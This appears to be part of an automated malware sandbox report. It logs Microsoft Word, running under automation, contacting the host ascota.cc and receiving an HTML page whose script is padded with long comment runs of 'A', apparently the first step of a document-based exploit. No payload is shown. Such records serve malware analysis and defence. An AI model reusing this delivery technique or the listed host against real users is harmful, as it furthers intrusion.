        x-amz-id-2: AhxK5aLQZ1PjKJoj0ibw5Xtl2lf0z/QP7EC/OySp7DCwGP9zWrvKgojPTiA0MsKZcB7AOdkKzvo=
        x-amz-request-id: YNG9STNWQ7HFF8XV
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        accept-ranges: bytes
        via: 1.1 fly.io
        2022-08-18 08:45:10 UTC | 5 | IN | Data Ascii: <!doctype html><html lang="en"><body><script>//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        2022-08-18 08:45:10 UTC | 12 | IN | Data Ascii: AAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAA


        Session ID: 7 | Source IP: 192.168.2.22 | Source Port: 49178 | Destination IP: 50.31.246.2 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Timestamp | kBytes transferred | Direction | Data
        2022-08-18 08:45:10 UTC | 14 | OUT | HEAD /index.html HTTP/1.1
        User-Agent: Microsoft Office Existence Discovery
        Host: ascota.cc
        Content-Length: 0
        Connection: Keep-Alive
        2022-08-18 08:45:10 UTC | 14 | IN | HTTP/1.1 200 OK
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21DVF39Z3A7ZKSQECSWH2-ams
        date: Thu, 18 Aug 2022 08:45:10 GMT
        content-type: text/html; charset=utf-8
        content-length: 9436
        x-amz-id-2: HR7igUOesPfCastI3h2FQOhhWsp2k3NgZZQd+iLy3m0d92PxPtHZULvIM12hiUzbZGcJPw2qxU0=
        x-amz-request-id: B35HXHYTB0YQGGDQ
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        accept-ranges: bytes
        via: 1.1 fly.io


        Session ID: 8 | Source IP: 192.168.2.22 | Source Port: 49179 | Destination IP: 50.31.246.2 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Timestamp | kBytes transferred | Direction | Data
        2022-08-18 08:45:10 UTC | 15 | OUT | HEAD /index.html HTTP/1.1
        User-Agent: Microsoft Office Existence Discovery
        Host: ascota.cc
        Content-Length: 0
        Connection: Keep-Alive
        2022-08-18 08:45:11 UTC | 15 | IN | HTTP/1.1 200 OK
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21EAS9MDEN75X427YDYCC-ams
        date: Thu, 18 Aug 2022 08:45:11 GMT
        content-type: text/html; charset=utf-8
        content-length: 9436
        x-amz-id-2: OsOiTPD8bnidS4SpG3HCJNAX5QYh7sTMji4DqVSeZiCSCYehuCsaGLhpnPZoR8INBEgcL3evKvA=
        x-amz-request-id: PBB0ZH5B75VYEHGV
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        accept-ranges: bytes
        via: 1.1 fly.io


        Session ID: 9 | Source IP: 192.168.2.22 | Source Port: 49180 | Destination IP: 50.31.246.2 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Timestamp | kBytes transferred | Direction | Data
        2022-08-18 08:45:11 UTC | 15 | OUT | OPTIONS / HTTP/1.1
        User-Agent: Microsoft Office Protocol Discovery
        Host: ascota.cc
        Content-Length: 0
        Connection: Keep-Alive
        2022-08-18 08:45:11 UTC | 15 | IN | HTTP/1.1 400 Bad Request
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21EP5AT8FVJBEERW6SPTK-ams
        date: Thu, 18 Aug 2022 08:45:11 GMT
        content-type: application/xml
        x-amz-request-id: PBB8W4QV1K6X9AYW
        x-amz-id-2: IzrvgZhCdOn/chNbzt9CdOfKEhC8Q/SwBU3e2VAiysopEQ8saCB7IzfwjIF7Y6PLOERKLew0Cq0KsrBvYZUD+A==
        transfer-encoding: chunked
        via: 1.1 fly.io
        2022-08-18 08:45:11 UTC | 16 | IN | Data Ascii: 127<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>PBB8W4QV1K6X9AYW</RequestId><HostId>IzrvgZhCdOn/chNbzt9CdOfKEhC8Q/SwBU3e2VAiysopEQ8saCB7IzfwjIF7


        Target ID:0
        Start time:10:44:15
        Start date:18/08/2022
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13f8e0000
        File size:1423704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        No disassembly